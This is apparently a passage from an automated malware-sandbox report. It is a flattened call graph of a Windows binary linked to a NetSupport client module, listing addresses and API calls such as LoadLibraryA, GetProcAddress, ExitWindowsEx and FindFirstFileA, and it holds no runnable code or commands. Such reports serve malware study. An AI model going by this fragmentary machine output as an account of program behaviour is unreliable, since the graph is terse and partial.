LeaveCriticalSection LeaveCriticalSection 88144->88406 88146 11029973 88408 11089fe0 269 API calls 2 library calls 88146->88408 88149 1102997e 88149->88013 88150 1102995e 88150->88146 88407 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 88150->88407 88152 11134872 88151->88152 88153 11134b94 88151->88153 88154 1105e820 79 API calls 88152->88154 88155 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 88153->88155 88156 11134892 88154->88156 88157 11134bac 88155->88157 88156->88153 88158 1113489a GetLocalTime 88156->88158 88199 11134310 88157->88199 88159 111348d1 LoadLibraryA 88158->88159 88160 111348b0 88158->88160 88409 11009940 LoadLibraryA 88159->88409 88161 11147060 std::_Mutex::_Mutex 21 API calls 88160->88161 88163 111348c5 88161->88163 88163->88159 88164 11134925 88410 110161e0 LoadLibraryA 88164->88410 88166 11134930 GetCurrentProcess 88167 11134955 GetProcAddress 88166->88167 88168 1113496d GetProcessHandleCount 88166->88168 88167->88168 88170 11134976 SetLastError 88167->88170 88169 1113497e 88168->88169 88171 111349a2 88169->88171 88172 11134988 GetProcAddress 88169->88172 88170->88169 88174 111349b0 GetProcAddress 88171->88174 88176 111349ca 88171->88176 88172->88171 88173 111349d7 SetLastError 88172->88173 88173->88174 88175 111349e4 SetLastError 88174->88175 88174->88176 88177 111349ef GetProcAddress 88175->88177 88176->88177 88178 11134a01 K32GetProcessMemoryInfo 88177->88178 88179 11134a0f SetLastError 88177->88179 88180 11134a17 88178->88180 88179->88180 88181 11147060 std::_Mutex::_Mutex 21 API calls 88180->88181 88185 11134a8d 88180->88185 88181->88185 88182 11134b6a 88183 11134b7a FreeLibrary 88182->88183 88184 11134b7d 88182->88184 88183->88184 88186 11134b87 FreeLibrary 88184->88186 88187 11134b8a 88184->88187 88185->88182 88189 1105e820 79 API calls 88185->88189 88186->88187 88187->88153 88188 11134b91 FreeLibrary 88187->88188 88188->88153 88190 11134ade 88189->88190 88191 1105e820 79 API calls 88190->88191 88192 11134b06 88191->88192 88193 1105e820 79 API calls 88192->88193 88194 11134b2d 88193->88194 88195 1105e820 79 API calls 88194->88195 88196 11134b54 88195->88196 88196->88182 88197 11134b65 88196->88197 88411 11027de0 265 API calls 2 library calls 88197->88411 88201 1113433d 88199->88201 88200 111347f9 88200->88019 88200->88020 88302 11139a70 88200->88302 88201->88200 88202 110d1930 268 API calls 88201->88202 88203 1113439e 88202->88203 88204 110d1930 268 API calls 88203->88204 88205 111343a9 88204->88205 88206 111343d7 88205->88206 88207 111343ee 88205->88207 88412 11029a70 265 API calls 2 library calls 88206->88412 88209 11147060 std::_Mutex::_Mutex 21 API calls 88207->88209 88211 111343fc 88209->88211 88413 110d1530 265 API calls 88211->88413 88299 11142d9a 88298->88299 88301 11142daf 88298->88301 88414 11142400 88299->88414 88301->88089 88303 11139eaf 88302->88303 88306 11139a8d 88302->88306 88304 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 88303->88304 88305 11139ebe 88304->88305 88305->88023 88306->88303 88307 11145c70 std::_Mutex::_Mutex 90 API calls 88306->88307 88308 11139acc 88307->88308 88308->88303 88309 1105e820 79 API calls 88308->88309 88310 11139afb 88309->88310 88546 1112d860 88310->88546 88312 11139c40 PostMessageA 88314 11139c55 88312->88314 88313 1105e820 79 API calls 88315 11139c3c 88313->88315 88316 11139c65 88314->88316 88555 11110000 InterlockedDecrement 88314->88555 88315->88312 88315->88314 88318 11139c6b 88316->88318 88319 11139c8d 88316->88319 88321 11139cc3 std::ios_base::_Ios_base_dtor 88318->88321 88322 11139cde 88318->88322 88556 11131320 315 API calls std::_Mutex::_Mutex 88319->88556 88329 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 88321->88329 88324 11143a50 145 API calls 88322->88324 88323 11139c95 88557 11147ad0 267 API calls 88323->88557 88327 11139ce3 88324->88327 88330 11147af0 269 API calls 88327->88330 88328 11139c9f 88558 1112da60 SetDlgItemTextA 88328->88558 88332 11139cda 88329->88332 88333 11139cea SetWindowTextA 88330->88333 88332->88023 88335 11139d06 88333->88335 88341 11139d0d std::ios_base::_Ios_base_dtor 88333->88341 88334 11139cb0 std::ios_base::_Ios_base_dtor 88334->88318 88559 111361c0 299 API calls 5 library calls 88335->88559 88336 11146710 271 API calls 88338 11139beb 88336->88338 88338->88312 88338->88313 88339 11139d64 88342 11139d78 88339->88342 88343 11139e3c 88339->88343 88340 11139d37 88340->88339 88346 11139d4c 88340->88346 88341->88339 88341->88340 88560 111361c0 299 API calls 5 library calls 88341->88560 88347 11139d9c 88342->88347 88562 111361c0 299 API calls 5 library calls 88342->88562 88345 11139e5d 88343->88345 88349 11139e4b 88343->88349 88350 11139e44 88343->88350 88568 110f8b70 86 API calls 88345->88568 88561 11132120 147 API calls 88346->88561 88564 110f8b70 86 API calls 88347->88564 88567 11132120 147 API calls 88349->88567 88566 111361c0 299 API calls 5 library calls 88350->88566 88353 11139da7 88353->88303 88361 11139daf IsWindowVisible 88353->88361 88355 11139d5c 88355->88339 88357 11139e68 88357->88303 88359 11139e6c IsWindowVisible 88357->88359 88359->88303 88363 11139e7e IsWindowVisible 88359->88363 88360 11139d86 88360->88347 88364 11139d92 88360->88364 88361->88303 88365 11139dc6 88361->88365 88362 11139e5a 88362->88345 88363->88303 88366 11139e8b EnableWindow 88363->88366 88563 11132120 147 API calls 88364->88563 88368 11145c70 std::_Mutex::_Mutex 90 API calls 88365->88368 88569 11132120 147 API calls 88366->88569 88371 11139dd1 88368->88371 88370 11139d99 88370->88347 88371->88303 88373 11139ddc GetForegroundWindow IsWindowVisible 88371->88373 88372 11139ea2 EnableWindow 88372->88303 88374 11139e01 88373->88374 88375 11139df6 EnableWindow 88373->88375 88565 11132120 147 API calls 88374->88565 88375->88374 88377 11139e08 88378 11139e1e EnableWindow 88377->88378 88379 11139e17 SetForegroundWindow 88377->88379 88380 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 88378->88380 88379->88378 88381 11139e38 88380->88381 88381->88023 88382->88080 88383->88088 88384->88065 88385->88074 88386->88055 88387->88042 88388->88052 88389->88066 88390->88078 88391->88067 88392->88099 88393->88111 88394->88115 88395->88125 88396->88130 88397->88134 88398->88122 88399->88091 88400->88102 88401->88110 88402->88114 88403->88122 88404->88139 88405->88141 88406->88150 88407->88150 88408->88149 88409->88164 88410->88166 88411->88182 88415 1114243f 88414->88415 88467 11142438 std::ios_base::_Ios_base_dtor 88414->88467 88416 111101b0 std::_Mutex::_Mutex 265 API calls 88415->88416 88417 11142446 88416->88417 88419 11142476 88417->88419 88421 11061aa0 301 API calls 88417->88421 88418 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 88420 11142d8a 88418->88420 88422 11062220 275 API calls 88419->88422 88420->88301 88421->88419 88423 111424b2 88422->88423 88424 111424b9 RegCloseKey 88423->88424 88425 111424c0 std::_Mutex::_Mutex 88423->88425 88424->88425 88426 111424cf 88425->88426 88427 1102a6d0 354 API calls 88425->88427 88428 11145990 267 API calls 88426->88428 88427->88426 88429 111424ec 88428->88429 88430 11143e00 std::_Mutex::_Mutex 8 API calls 88429->88430 88431 11142500 88430->88431 88432 11142517 88431->88432 88433 11063880 330 API calls 88431->88433 88434 111101b0 std::_Mutex::_Mutex 265 API calls 88432->88434 88433->88432 88435 1114251e 88434->88435 88436 1114253a 88435->88436 88437 11061710 293 API calls 88435->88437 88438 111101b0 std::_Mutex::_Mutex 265 API calls 88436->88438 88437->88436 88439 11142553 88438->88439 88440 1114256f 88439->88440 88441 11061710 293 API calls 88439->88441 88442 111101b0 std::_Mutex::_Mutex 265 API calls 88440->88442 88441->88440 88443 11142588 88442->88443 88444 111425a4 88443->88444 88445 11061710 293 API calls 88443->88445 88446 11061290 268 API calls 88444->88446 88445->88444 88447 111425cd 88446->88447 88448 11061290 268 API calls 88447->88448 88485 111425e7 88448->88485 88449 11142915 88451 110d1930 268 API calls 88449->88451 88454 11142cf9 88449->88454 88450 11061320 274 API calls 88450->88485 88452 11142933 88451->88452 88457 1105e820 79 API calls 88452->88457 88453 11142905 88456 11147060 std::_Mutex::_Mutex 21 API calls 88453->88456 88460 11061170 69 API calls 88454->88460 88455 11081e70 86 API calls 88455->88485 88456->88449 88459 11142970 88457->88459 88458 11147060 21 API calls std::_Mutex::_Mutex 88458->88485 88461 11142abd 88459->88461 88463 11061290 268 API calls 88459->88463 88462 11142d52 88460->88462 88465 11061a70 274 API calls 88461->88465 88464 11061170 69 API calls 88462->88464 88466 1114298e 88463->88466 88464->88467 88468 11142ad9 88465->88468 88469 11061320 274 API calls 88466->88469 88467->88418 88541 110684e0 298 API calls std::_Mutex::_Mutex 88468->88541 88476 1114299d 88469->88476 88470 111429d2 88473 11061290 268 API calls 88470->88473 88472 11147060 std::_Mutex::_Mutex 21 API calls 88472->88476 88477 111429e8 88473->88477 88474 11142b03 88475 11142b33 EnterCriticalSection 88474->88475 88487 11142b07 88474->88487 88480 11060f50 271 API calls 88475->88480 88476->88470 88476->88472 88481 11061320 274 API calls 88476->88481 88478 11061320 274 API calls 88477->88478 88496 111429f8 88478->88496 88479 11132900 86 API calls 88479->88485 88483 11142b50 88480->88483 88481->88476 88488 11061a70 274 API calls 88483->88488 88484 11081f20 86 API calls std::_Mutex::_Mutex 88484->88485 88485->88449 88485->88450 88485->88453 88485->88455 88485->88458 88485->88479 88485->88484 88486 11142a31 88489 11061290 268 API calls 88486->88489 88487->88475 88542 11051360 354 API calls 4 library calls 88487->88542 88543 110684e0 298 API calls std::_Mutex::_Mutex 88487->88543 88490 11142b66 88488->88490 88492 11142a47 88489->88492 88493 11142b7a LeaveCriticalSection 88490->88493 88499 1102b140 283 API calls 88490->88499 88491 11147060 std::_Mutex::_Mutex 21 API calls 88491->88496 88498 11061320 274 API calls 88492->88498 88494 11142bce 88493->88494 88495 11142b8e 88493->88495 88500 11134310 273 API calls 88494->88500 88495->88494 88504 11147060 std::_Mutex::_Mutex 21 API calls 88495->88504 88496->88486 88496->88491 88502 11061320 274 API calls 88496->88502 88512 11142a56 88498->88512 88501 11142b77 88499->88501 88503 11142bd8 88500->88503 88501->88493 88502->88496 88506 110d1930 268 API calls 88503->88506 88508 11142b9c 88504->88508 88505 11142a91 88507 11061170 69 API calls 88505->88507 88509 11142be6 88506->88509 88510 11142a9f 88507->88510 88516 11142010 386 API calls 88508->88516 88544 110d0170 265 API calls std::_Mutex::_Mutex 88509->88544 88513 11061170 69 API calls 88510->88513 88511 11147060 std::_Mutex::_Mutex 21 API calls 88511->88512 88512->88505 88512->88511 88514 11061320 274 API calls 88512->88514 88515 11142aae 88513->88515 88514->88512 88519 11142ba7 88516->88519 88519->88494 88521 11147060 std::_Mutex::_Mutex 21 API calls 88519->88521 88520 11142c1c 88535 11142c9f 88520->88535 88545 110d1530 265 API calls 88520->88545 88524 11142bc0 88521->88524 88527 11027200 740 API calls 88524->88527 88527->88494 88541->88474 88542->88487 88543->88487 88544->88520 88547 1112d87c 88546->88547 88548 1112d8b7 88547->88548 88549 1112d8a4 88547->88549 88570 1106c340 298 API calls 88548->88570 88551 11147af0 269 API calls 88549->88551 88552 1112d8af 88551->88552 88553 1112d903 88552->88553 88554 11142e60 std::_Mutex::_Mutex 265 API calls 88552->88554 88553->88336 88553->88338 88554->88553 88555->88316 88556->88323 88557->88328 88558->88334 88559->88341 88560->88340 88561->88355 88562->88360 88563->88370 88564->88353 88565->88377 88566->88349 88567->88362 88568->88357 88569->88372 88570->88552 88571 11135c20 88572 11135c29 88571->88572 88578 11135c58 88571->88578 88573 11145ef0 std::_Mutex::_Mutex 90 API calls 88572->88573 88574 11135c2e 88573->88574 88575 11133b00 274 API calls 88574->88575 88574->88578 88576 11135c37 88575->88576 88577 1105e820 79 API calls 88576->88577 88576->88578 88577->88578 88579 1115cca0 88580 1115ccb4 88579->88580 88581 1115ccac 88579->88581 88582 1116406b _calloc 66 API calls 88580->88582 88583 1115ccc8 88582->88583 88584 1115ccd4 88583->88584 88586 1115ce00 88583->88586 88591 1115c8e0 CoInitializeSecurity CoCreateInstance 88583->88591 88587 11163aa5 _free 66 API calls 88586->88587 88588 1115ce28 88587->88588 88589 1115ccf1 88589->88586 88589->88589 88590 1115cde4 SetLastError 88589->88590 88590->88589 88592 1115c955 wsprintfW SysAllocString 88591->88592 88593 1115cad4 88591->88593 88598 1115c99b 88592->88598 88594 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 88593->88594 88596 1115cb00 88594->88596 88595 1115cac1 SysFreeString 88595->88593 88596->88589 88597 1115caa9 88597->88595 88598->88595 88598->88597 88598->88598 88599 1115ca2c 88598->88599 88600 1115ca1a wsprintfW 88598->88600 88608 110978f0 88599->88608 88600->88599 88602 1115ca3e 88603 110978f0 266 API calls 88602->88603 88604 1115ca53 88603->88604 88613 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 88604->88613 88606 1115ca97 88614 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 88606->88614 88609 111101b0 std::_Mutex::_Mutex 265 API calls 88608->88609 88610 11097923 88609->88610 88611 11097936 SysAllocString 88610->88611 88612 11097954 88610->88612 88611->88612 88612->88602 88613->88606 88614->88597 88615 1102d9f4 88616 1102da01 88615->88616 88617 1102da22 88616->88617 88702 1109f5f0 273 API calls std::_Mutex::_Mutex 88616->88702 88703 11029490 457 API calls std::_Mutex::_Mutex 88617->88703 88620 1102da33 88685 11028690 SetEvent 88620->88685 88622 1102da38 88623 1102da42 88622->88623 88624 1102da4d 88622->88624 88704 110eccf0 790 API calls 88623->88704 88626 1102da6a 88624->88626 88627 1102da6f 88624->88627 88705 11059fb0 SetEvent 88626->88705 88628 1102da77 88627->88628 88629 1102daae 88627->88629 88628->88629 88636 1102daa3 Sleep 88628->88636 88631 11147060 std::_Mutex::_Mutex 21 API calls 88629->88631 88632 1102dab8 88631->88632 88633 1102dac5 88632->88633 88634 1102daf6 88632->88634 88633->88632 88637 1105e820 79 API calls 88633->88637 88635 1102daf3 88634->88635 88686 110b0470 88634->88686 88635->88634 88636->88629 88638 1102dae8 88637->88638 88638->88634 88706 1102d750 294 API calls std::_Mutex::_Mutex 88638->88706 88645 1102db3a 88646 1102db4d 88645->88646 88708 111361c0 299 API calls 5 library calls 88645->88708 88647 1100d620 FreeLibrary 88646->88647 88649 1102de59 88647->88649 88650 1102de70 88649->88650 88651 1100d330 wsprintfA 88649->88651 88654 1102de97 GetModuleFileNameA GetFileAttributesA 88650->88654 88661 1102dfb3 88650->88661 88652 1102de65 88651->88652 88653 11147060 std::_Mutex::_Mutex 21 API calls 88652->88653 88653->88650 88655 1102debf 88654->88655 88654->88661 88658 111101b0 std::_Mutex::_Mutex 265 API calls 88655->88658 88656 11147060 std::_Mutex::_Mutex 21 API calls 88657 1102e062 88656->88657 88711 11147020 FreeLibrary 88657->88711 88660 1102dec6 88658->88660 88662 11143630 267 API calls 88660->88662 88661->88656 88672 1102dee8 88662->88672 88663 1102e06a 88664 1102e0a6 88663->88664 88665 1102e094 ExitWindowsEx 88663->88665 88666 1102e084 ExitWindowsEx Sleep 88663->88666 88667 1102e0b6 88664->88667 88668 1102e0ab Sleep 88664->88668 88665->88664 88666->88665 88669 11147060 std::_Mutex::_Mutex 21 API calls 88667->88669 88668->88667 88671 1102e0c0 ExitProcess 88669->88671 88673 11143780 86 API calls 88672->88673 88674 1102df0d 88673->88674 88674->88661 88675 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 88674->88675 88676 1102df23 88675->88676 88677 1102df3e _memset 88676->88677 88709 11029a70 265 API calls 2 library calls 88676->88709 88679 1102df58 FindFirstFileA 88677->88679 88680 1102df78 FindNextFileA 88679->88680 88682 1102df98 FindClose 88680->88682 88683 1102dfa4 88682->88683 88710 111273e0 291 API calls 5 library calls 88683->88710 88685->88622 88712 110808b0 88686->88712 88691 1102db1a 88695 110eb4a0 88691->88695 88692 110b04b7 88724 11029a70 265 API calls 2 library calls 88692->88724 88696 110b0470 267 API calls 88695->88696 88697 110eb4cd 88696->88697 88740 110ea880 88697->88740 88701 1102db25 88707 110b0660 267 API calls std::_Mutex::_Mutex 88701->88707 88702->88617 88703->88620 88704->88624 88705->88627 88706->88635 88707->88645 88708->88646 88710->88661 88711->88663 88713 110808d4 88712->88713 88714 110808d8 88713->88714 88715 110808ef 88713->88715 88725 11029a70 265 API calls 2 library calls 88714->88725 88717 11080908 88715->88717 88718 110808ec 88715->88718 88721 110b0460 88717->88721 88718->88715 88726 11029a70 265 API calls 2 library calls 88718->88726 88727 11081590 88721->88727 88728 110815dd 88727->88728 88729 110815b1 88727->88729 88732 1108162a wsprintfA 88728->88732 88733 11081605 wsprintfA 88728->88733 88729->88728 88730 110815cb 88729->88730 88731 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 88730->88731 88734 110815d9 88731->88734 88739 11029a70 265 API calls 2 library calls 88732->88739 88733->88728 88734->88691 88734->88692 88742 110ea88b 88740->88742 88741 110ea925 88750 110b0660 267 API calls std::_Mutex::_Mutex 88741->88750 88742->88741 88743 110ea8ae 88742->88743 88744 110ea8c5 88742->88744 88751 11029a70 265 API calls 2 library calls 88743->88751 88746 110ea8c2 88744->88746 88747 110ea8f2 SendMessageTimeoutA 88744->88747 88746->88744 88752 11029a70 265 API calls 2 library calls 88746->88752 88747->88741 88750->88701 88753 110310d5 GetNativeSystemInfo 88754 110310e1 88753->88754 88758 11031081 88754->88758 88759 11031145 88754->88759 88768 11031088 88754->88768 88755 110312db GetStockObject GetObjectA 88756 1103130a SetErrorMode SetErrorMode 88755->88756 88760 111101b0 std::_Mutex::_Mutex 265 API calls 88756->88760 88761 111101b0 std::_Mutex::_Mutex 265 API calls 88758->88761 88762 111101b0 std::_Mutex::_Mutex 265 API calls 88759->88762 88763 11031346 88760->88763 88761->88768 88764 1103114c 88762->88764 88766 11028980 268 API calls 88763->88766 88821 110fae60 272 API calls std::_Mutex::_Mutex 88764->88821 88767 11031360 88766->88767 88769 111101b0 std::_Mutex::_Mutex 265 API calls 88767->88769 88768->88755 88770 11031386 88769->88770 88771 11028980 268 API calls 88770->88771 88772 1103139f InterlockedExchange 88771->88772 88774 111101b0 std::_Mutex::_Mutex 265 API calls 88772->88774 88775 110313c7 88774->88775 88776 1108a880 267 API calls 88775->88776 88777 110313df GetACP 88776->88777 88779 11163f93 _sprintf 102 API calls 88777->88779 88780 11031406 88779->88780 88781 111663a3 _setlocale 101 API calls 88780->88781 88782 11031410 88781->88782 88783 11143780 86 API calls 88782->88783 88784 1103143c 88783->88784 88785 111101b0 std::_Mutex::_Mutex 265 API calls 88784->88785 88786 1103145c 88785->88786 88787 11061aa0 301 API calls 88786->88787 88788 11031487 88787->88788 88789 111101b0 std::_Mutex::_Mutex 265 API calls 88788->88789 88796 110314d4 88788->88796 88791 110314ae 88789->88791 88790 110ccc90 4 API calls 88792 110314fa 88790->88792 88795 11061710 293 API calls 88791->88795 88793 111101b0 std::_Mutex::_Mutex 265 API calls 88792->88793 88794 11031501 88793->88794 88797 11125d40 512 API calls 88794->88797 88795->88796 88796->88790 88798 11031523 88797->88798 88799 11114fb0 268 API calls 88798->88799 88800 11031544 88799->88800 88801 111101b0 std::_Mutex::_Mutex 265 API calls 88800->88801 88802 1103155b 88801->88802 88803 11088b30 268 API calls 88802->88803 88804 11031573 88803->88804 88805 111101b0 std::_Mutex::_Mutex 265 API calls 88804->88805 88806 1103158a 88805->88806 88807 1105cdb0 325 API calls 88806->88807 88808 110315ae 88807->88808 88809 1105d1a0 430 API calls 88808->88809 88810 110315d4 88809->88810 88811 11027810 122 API calls 88810->88811 88812 110315d9 88811->88812 88813 1100d620 FreeLibrary 88812->88813 88814 110315f4 88813->88814 88815 1100d330 wsprintfA 88814->88815 88818 1103160d 88814->88818 88816 11031602 88815->88816 88817 11147060 std::_Mutex::_Mutex 21 API calls 88816->88817 88817->88818 88819 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 88818->88819 88820 11031773 88819->88820 88821->88768 88822 6ef15ae6 88823 6ef15af1 ___security_init_cookie 88822->88823 88824 6ef15af6 88822->88824 88823->88824 88827 6ef159f0 88824->88827 88826 6ef15b04 88828 6ef159fc 88827->88828 88832 6ef15a99 88828->88832 88833 6ef15a49 88828->88833 88835 6ef1588c 88828->88835 88830 6ef15a79 88831 6ef1588c __CRT_INIT@12 111 API calls 88830->88831 88830->88832 88831->88832 88832->88826 88833->88830 88833->88832 88834 6ef1588c __CRT_INIT@12 111 API calls 88833->88834 88834->88830 88836 6ef15898 88835->88836 88837 6ef158a0 88836->88837 88838 6ef1591a 88836->88838 88878 6ef1607f HeapCreate 88837->88878 88839 6ef15920 88838->88839 88840 6ef1597b 88838->88840 88849 6ef1593e 88839->88849 88855 6ef158a9 88839->88855 88885 6ef15e35 10 API calls _doexit 88839->88885 88842 6ef15980 88840->88842 88843 6ef159d9 88840->88843 88889 6ef16da9 TlsGetValue DecodePointer TlsSetValue 88842->88889 88844 6ef159de __freeptd 88843->88844 88843->88855 88844->88855 88846 6ef158a5 88854 6ef158c0 __RTC_Initialize GetCommandLineA ___crtGetEnvironmentStringsA 88846->88854 88846->88855 88847 6ef15985 __calloc_crt 88852 6ef1599d DecodePointer 88847->88852 88847->88855 88850 6ef1594d 88849->88850 88886 6ef19b09 HeapFree GetLastError DeleteCriticalSection _free 88849->88886 88888 6ef15965 6 API calls __mtterm 88850->88888 88859 6ef159b2 88852->88859 88879 6ef198c4 9 API calls 88854->88879 88855->88833 88856 6ef15948 88887 6ef16dfa 6 API calls _free 88856->88887 88861 6ef159b6 88859->88861 88862 6ef159cd 88859->88862 88860 6ef158df 88864 6ef158e3 88860->88864 88865 6ef158ea 88860->88865 88890 6ef16e37 12 API calls 2 library calls 88861->88890 88863 6ef11bfd _free 2 API calls 88862->88863 88863->88855 88880 6ef16dfa 6 API calls _free 88864->88880 88881 6ef1ef5b 84 API calls 2 library calls 88865->88881 88869 6ef159bd GetCurrentThreadId 88869->88855 88870 6ef158ef 88871 6ef15903 88870->88871 88882 6ef1ecd4 76 API calls 4 library calls 88870->88882 88877 6ef15908 88871->88877 88884 6ef19b09 HeapFree GetLastError DeleteCriticalSection _free 88871->88884 88874 6ef15918 88874->88864 88875 6ef158f8 88875->88871 88883 6ef15c32 EncodePointer __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 88875->88883 88877->88855 88878->88846 88879->88860 88880->88855 88881->88870 88882->88875 88883->88871 88884->88874 88885->88849 88886->88856 88887->88850 88888->88855 88889->88847 88890->88869 88891 f71020 GetCommandLineA 88892 f71035 GetStartupInfoA 88891->88892 88894 f71090 GetModuleHandleA 88892->88894 88895 f7108b 88892->88895 88898 f71000 _NSMClient32 88894->88898 88895->88894 88897 f710a2 ExitProcess 88898->88897 88899 11089cf0 88900 111103d0 ___DllMainCRTStartup 4 API calls 88899->88900 88901 11089d03 88900->88901 88903 11089d0d 88901->88903 88911 11089430 268 API calls std::_Mutex::_Mutex 88901->88911 88904 11089d34 88903->88904 88912 11089430 268 API calls std::_Mutex::_Mutex 88903->88912 88907 11089d43 88904->88907 88908 11089cc0 88904->88908 88913 11089950 88908->88913 88911->88903 88912->88904 88954 11088c40 6 API calls ___DllMainCRTStartup 88913->88954 88915 11089989 GetParent 88916 1108999c 88915->88916 88917 110899ad 88915->88917 88918 110899a0 GetParent 88916->88918 88919 11145990 267 API calls 88917->88919 88918->88917 88918->88918 88920 110899b9 88919->88920 88921 11164ead std::_Mutex::_Mutex 143 API calls 88920->88921 88922 110899c6 std::ios_base::_Ios_base_dtor 88921->88922 88923 11145990 267 API calls 88922->88923 88924 110899df 88923->88924 88955 11013dd0 22 API calls 2 library calls 88924->88955 88926 110899fa 88926->88926 88927 11143e00 std::_Mutex::_Mutex 8 API calls 88926->88927 88930 11089a3a std::ios_base::_Ios_base_dtor 88927->88930 88928 11089a55 88929 11164c77 std::_Mutex::_Mutex 102 API calls 88928->88929 88932 11089a73 std::_Mutex::_Mutex 88928->88932 88929->88932 88930->88928 88931 11142e60 std::_Mutex::_Mutex 265 API calls 88930->88931 88931->88928 88934 1102ad70 std::_Mutex::_Mutex 145 API calls 88932->88934 88941 11089b24 std::ios_base::_Ios_base_dtor 88932->88941 88933 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 88935 11089c12 88933->88935 88936 11089ac3 88934->88936 88935->88907 88937 11142e60 std::_Mutex::_Mutex 265 API calls 88936->88937 88938 11089acb 88937->88938 88939 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 88938->88939 88940 11089ae2 88939->88940 88940->88941 88942 11081e70 86 API calls 88940->88942 88941->88933 88943 11089afa 88942->88943 88944 11089b3e 88943->88944 88945 11089b01 88943->88945 88947 11081e70 86 API calls 88944->88947 88956 110b7aa0 88945->88956 88949 11089b49 88947->88949 88949->88941 88951 110b7aa0 68 API calls 88949->88951 88950 110b7aa0 68 API calls 88950->88941 88952 11089b56 88951->88952 88952->88941 88953 110b7aa0 68 API calls 88952->88953 88953->88941 88954->88915 88955->88926 88959 110b7a80 88956->88959 88962 111681a3 88959->88962 88965 11168124 88962->88965 88966 11168131 88965->88966 88967 1116814b 88965->88967 88983 1116a1c2 66 API calls __getptd_noexit 88966->88983 88967->88966 88968 11168154 GetFileAttributesA 88967->88968 88970 11168162 GetLastError 88968->88970 88978 11168178 88968->88978 88986 1116a1d5 66 API calls 3 library calls 88970->88986 88971 11168136 88984 1116a1af 66 API calls __getptd_noexit 88971->88984 88973 11089b07 88973->88941 88973->88950 88975 1116813d 88985 1116edc4 11 API calls _sprintf 88975->88985 88976 1116816e 88987 1116a1af 66 API calls __getptd_noexit 88976->88987 88978->88973 88988 1116a1c2 66 API calls __getptd_noexit 88978->88988 88981 1116818b 88989 1116a1af 66 API calls __getptd_noexit 88981->88989 88983->88971 88984->88975 88985->88973 88986->88976 88987->88973 88988->88981 88989->88976 88990 1116a5cd 88991 1116a5dd 88990->88991 88992 1116a5d8 88990->88992 88996 1116a4d7 88991->88996 89008 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 88992->89008 88995 1116a5eb 88997 1116a4e3 __close 88996->88997 88998 1116a530 88997->88998 89006 1116a580 __close 88997->89006 89009 1116a373 88997->89009 88998->89006 89058 11026410 88998->89058 89001 1116a543 89002 1116a560 89001->89002 89004 11026410 ___DllMainCRTStartup 7 API calls 89001->89004 89003 1116a373 __CRT_INIT@12 150 API calls 89002->89003 89002->89006 89003->89006 89005 1116a557 89004->89005 89007 1116a373 __CRT_INIT@12 150 API calls 89005->89007 89006->88995 89007->89002 89008->88991 89010 1116a37f __close 89009->89010 89011 1116a387 89010->89011 89012 1116a401 89010->89012 89067 1116e390 HeapCreate 89011->89067 89013 1116a462 89012->89013 89021 1116a407 89012->89021 89015 1116a467 89013->89015 89016 1116a4c0 89013->89016 89017 1116c4ba ___set_flsgetvalue 3 API calls 89015->89017 89019 1116a390 __close 89016->89019 89161 1116c7be 79 API calls __freefls@4 89016->89161 89022 1116a46c 89017->89022 89018 1116a38c 89018->89019 89068 1116c82c GetModuleHandleW 89018->89068 89019->88998 89020 1116a425 89025 1116a439 89020->89025 89156 1117226e 67 API calls _free 89020->89156 89021->89019 89021->89020 89155 1116e65b 66 API calls _doexit 89021->89155 89027 1116ac7e __calloc_crt 66 API calls 89022->89027 89159 1116a44c 70 API calls __mtterm 89025->89159 89031 1116a478 89027->89031 89028 1116a39c __RTC_Initialize 89032 1116a3a0 89028->89032 89040 1116a3ac GetCommandLineA 89028->89040 89031->89019 89034 1116a484 DecodePointer FlsSetValue 89031->89034 89152 1116e3ae HeapDestroy 89032->89152 89033 1116a42f 89157 1116c50b 70 API calls _free 89033->89157 89037 1116a4b4 89034->89037 89038 1116a49d 89034->89038 89042 11163aa5 _free 66 API calls 89037->89042 89160 1116c548 66 API calls 4 library calls 89038->89160 89039 1116a434 89158 1116e3ae HeapDestroy 89039->89158 89093 11177e54 GetEnvironmentStringsW 89040->89093 89042->89019 89045 1116a4a4 GetCurrentThreadId 89045->89019 89049 1116a3ca 89153 1116c50b 70 API calls _free 89049->89153 89053 1116a3ea 89053->89019 89154 1117226e 67 API calls _free 89053->89154 89059 111104e0 89058->89059 89060 11110501 89059->89060 89061 111104ec 89059->89061 89062 11110514 ___DllMainCRTStartup 89059->89062 89178 11110430 89060->89178 89061->89062 89064 11110430 ___DllMainCRTStartup 7 API calls 89061->89064 89062->89001 89066 111104f5 89064->89066 89065 11110508 89065->89001 89066->89001 89067->89018 89069 1116c840 89068->89069 89070 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 89068->89070 89162 1116c50b 70 API calls _free 89069->89162 89074 1116c893 TlsAlloc 89070->89074 89073 1116c845 89073->89028 89075 1116c9a2 89074->89075 89076 1116c8e1 TlsSetValue 89074->89076 89075->89028 89076->89075 89077 1116c8f2 89076->89077 89163 1116e417 EncodePointer EncodePointer __init_pointers ___crtMessageBoxW __initp_misc_winsig 89077->89163 89079 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 89164 11174425 InitializeCriticalSectionAndSpinCount 89079->89164 89081 1116c936 89082 1116c99d 89081->89082 89083 1116c93a DecodePointer 89081->89083 89166 1116c50b 70 API calls _free 89082->89166 89085 1116c94f 89083->89085 89085->89082 89086 1116ac7e __calloc_crt 66 API calls 89085->89086 89087 